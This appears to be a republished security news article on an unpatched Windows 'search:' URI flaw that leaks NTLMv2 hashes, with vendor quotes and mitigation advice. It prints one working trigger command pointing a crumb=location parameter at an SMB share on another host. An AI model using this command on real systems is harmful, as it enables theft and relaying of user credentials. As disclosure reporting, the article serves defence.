Close Menu

    Subscribe to Updates

    Get the latest creative news from infofortech

    What's Hot

    Home Batteries: How They’re Installed and How Much They Cost

    June 21, 2026

    NASA Is Testing A Rover That Can Drive Faster And Lift Its Wheels To Climb Obstacles

    June 21, 2026

    AI, user data and the asymmetry of understanding

    June 20, 2026
    Facebook X (Twitter) Instagram
    InfoForTech
    • Home
    • Latest in Tech
    • Artificial Intelligence
    • Cybersecurity
    • Innovation
    Facebook X (Twitter) Instagram
    InfoForTech
    Home»Cybersecurity»Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes
    Cybersecurity

    Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes

    InfoForTechBy InfoForTechJune 3, 2026No Comments2 Mins Read
    Facebook Twitter Pinterest Telegram LinkedIn Tumblr WhatsApp Email
    Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes
    Share
    Facebook Twitter LinkedIn Pinterest Telegram Email


    Ravie LakshmananJun 03, 2026Vulnerability / Network Security

    Cybersecurity researchers have disclosed details of an unpatched issue that could be exploited to disclose a user’s NTLMv2 hash to the attacker.

    Like in the case of CVE-2026-33829, which impacted the Windows Snipping Tool’s ms-screensketch: URI handler, the newly flagged issue resides in the search: URI handler, per Huntress.

    CVE-2026-33829 refers to a spoofing vulnerability that could expose sensitive information to an unauthorized actor. It was patched by Microsoft in April 2026.

    “An attacker could induce the user into clicking a specially crafted link in a Web browser or other URL source, by embedding it in a Web page or email message,” Microsoft noted in its advisory at the time.

    “If the user approves the launching of the link, the crafted URL can induce the computer to connect to an SMB server of the attacker’s choosing, which would disclose the user’s NTLMv2 hash to the attacker, who could use this to authenticate as the user.”

    Specifically, the problem had to do with the fact that the Snipping Tool’s URI handler accepted a “filePath” parameter, failed to validate it, and would reach out to any Universal Naming Convention (UNC) path passed to it. This, in turn, could trigger NTLM authentication and expose the victim’s Net-NTLMv2 hash to the attacker.

    The newly discovered shortcoming achieves the same end goal using “search:” and “crumb=location:” instead of “filePath” using a command like below –

    start "" "search:query=test&crumb=location:\\10.0.1.100\share"

    “It used the same NTLM leakage mechanism, produced the same Net-NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating,” Huntress researcher Andrew Schwartz said. It’s worth noting that the use of a “crumb” parameter to steal the hash (CVE-2023-35636) was documented by Varonis in February 2024.

    As a result, a threat actor could leverage the captured hash to conduct relay attacks and gain deeper access into a network. Following responsible disclosure on April 15, 2026, Microsoft declined to address the issue, stating “only Important and Critical severity cases meet our bar for servicing.”

    In the absence of a fix, it’s advised to block outbound SMB (TCP/445 and TCP/139) on hosts that don’t need it, enforce SMB signing so that captured hashes can’t be relayed against internal services, and disable NTLM where applicable.

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    InfoForTech
    • Website

    Related Posts

    Hackers Exploit Gravity SMTP WordPress Plugin Bug to Expose API Keys

    June 20, 2026

    124M Passwords Exposed as Infostealer Malware Hits Millions of Devices

    June 20, 2026

    Penetration Testing Company South Africa

    June 20, 2026

    Active Directory Hardening: Plan, Checklist, and Best Practices

    June 19, 2026

    AutoJack Attack Lets One Web Page Hijack AI Agent for Host Code Execution

    June 19, 2026

    24B Records Exposed in Massive Leak of Emails, Passwords, and Login Data

    June 19, 2026
    Leave A Reply Cancel Reply

    Advertisement
    Top Posts

    DoJ Disrupts 3 Million-Device IoT Botnets Behind Record 31.4 Tbps Global DDoS Attacks

    March 20, 202638 Views

    Microsoft is bringing an AI helper to Xbox consoles

    March 14, 202616 Views

    This is the tech that makes Volvo’s latest EV a major step forward

    January 24, 202616 Views

    Why Security Validation Is Becoming Agentic

    March 16, 202615 Views
    Stay In Touch
    • Facebook
    • Twitter
    • Pinterest
    • Instagram
    • YouTube
    • Vimeo
    Advertisement
    About Us
    About Us

    Our mission is to deliver clear, reliable, and up-to-date information about the technologies shaping the modern world. We focus on breaking down complex topics into easy-to-understand insights for professionals, enthusiasts, and everyday readers alike.

    We're accepting new partnerships right now.

    Facebook X (Twitter) YouTube
    Most Popular

    DoJ Disrupts 3 Million-Device IoT Botnets Behind Record 31.4 Tbps Global DDoS Attacks

    March 20, 202638 Views

    Microsoft is bringing an AI helper to Xbox consoles

    March 14, 202616 Views

    This is the tech that makes Volvo’s latest EV a major step forward

    January 24, 202616 Views
    Categories
    • Artificial Intelligence
    • Cybersecurity
    • Innovation
    • Latest in Tech
    © 2026 All Rights Reserved InfoForTech.
    • Home
    • About Us
    • Contact Us
    • Privacy Policy

    Type above and press Enter to search. Press Esc to cancel.

    Ad Blocker Enabled!
    Ad Blocker Enabled!
    Our website is made possible by displaying online advertisements to our visitors. Please support us by disabling your Ad Blocker.